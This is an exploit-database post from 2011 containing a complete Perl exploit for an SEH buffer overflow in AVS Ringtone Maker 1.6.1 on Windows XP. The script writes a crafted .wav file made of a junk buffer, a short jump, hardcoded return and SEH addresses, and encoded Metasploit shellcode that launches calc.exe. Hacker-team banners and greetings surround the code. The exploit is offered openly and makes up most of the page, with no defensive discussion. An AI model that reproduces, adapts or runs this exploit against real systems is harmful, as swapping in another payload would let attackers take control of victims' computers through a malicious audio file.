AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit



EKU-ID: 245 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2011-05-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------` © 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0       AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit                1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : windows
# Tested on : Windows XP sp3 FR
##
# Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC !
###

my $junk = "\x41" x 4123 ; # Buffer Junk
my $jump = "\xeb\x06\x90\x90"; #  Short Jump
my $eip = pack("V", 0x00401E3C); # EIP
my $seh = pack("V", 0x7C839AC0); # SEH

# windows/exec - 511 bytes ( http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
my $shellcode = "\xe8\x52\xe6\xff\xff\x90\x90".
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49" .
"\x78\x4d\x59\x47\x70\x43\x30\x43\x30\x43\x50\x4e\x69\x49" .
"\x75\x46\x51\x4b\x62\x42\x44\x4e\x6b\x46\x32\x46\x50\x4c" .
"\x4b\x43\x62\x44\x4c\x4c\x4b\x42\x72\x47\x64\x4e\x6b\x51" .
"\x62\x51\x38\x44\x4f\x4e\x57\x43\x7a\x44\x66\x44\x71\x4b" .
"\x4f\x45\x61\x49\x50\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x46" .
"\x62\x44\x6c\x51\x30\x49\x51\x48\x4f\x44\x4d\x47\x71\x49" .
"\x57\x4a\x42\x4c\x30\x42\x72\x50\x57\x4c\x4b\x51\x42\x44" .
"\x50\x4c\x4b\x51\x52\x45\x6c\x46\x61\x4e\x30\x4c\x4b\x47" .
"\x30\x50\x78\x4d\x55\x49\x50\x42\x54\x43\x7a\x43\x31\x4a" .
"\x70\x42\x70\x4c\x4b\x51\x58\x44\x58\x4e\x6b\x50\x58\x45" .
"\x70\x46\x61\x4e\x33\x48\x63\x45\x6c\x50\x49\x4c\x4b\x44" .
"\x74\x4c\x4b\x46\x61\x49\x46\x46\x51\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x48\x4f\x44\x4d\x43\x31\x48\x47\x45" .
"\x68\x49\x70\x42\x55\x49\x64\x43\x33\x51\x6d\x49\x68\x47" .
"\x4b\x43\x4d\x47\x54\x51\x65\x4a\x42\x51\x48\x4c\x4b\x42" .
"\x78\x51\x34\x47\x71\x4b\x63\x50\x66\x4c\x4b\x44\x4c\x50" .
"\x4b\x4c\x4b\x50\x58\x47\x6c\x43\x31\x4a\x73\x4c\x4b\x43" .
"\x34\x4e\x6b\x45\x51\x4a\x70\x4b\x39\x47\x34\x51\x34\x44" .
"\x64\x51\x4b\x43\x6b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b" .
"\x4f\x4b\x50\x51\x48\x43\x6f\x42\x7a\x4e\x6b\x45\x42\x4a" .
"\x4b\x4f\x76\x51\x4d\x50\x6a\x46\x61\x4c\x4d\x4f\x75\x48" .
"\x39\x43\x30\x43\x30\x45\x50\x42\x70\x50\x68\x46\x51\x4e" .
"\x6b\x42\x4f\x4e\x67\x49\x6f\x4a\x75\x4d\x6b\x49\x6e\x44" .
"\x4e\x46\x52\x4a\x4a\x51\x78\x4e\x46\x4a\x35\x4d\x6d\x4f" .
"\x6d\x49\x6f\x4a\x75\x45\x6c\x46\x66\x51\x6c\x44\x4a\x4f" .
"\x70\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x50\x47\x45" .
"\x43\x51\x62\x42\x4f\x43\x5a\x43\x30\x42\x73\x49\x6f\x4e" .
"\x35\x42\x43\x45\x31\x50\x6c\x51\x73\x44\x6e\x43\x55\x51" .
"\x68\x50\x65\x47\x70\x41\x41";
my $exploit = $junk.$jump.$eip.$seh.$shellcode;
open (FILE ,'> KedAns.wav');
print FILE $exploit;

#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org)
# (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================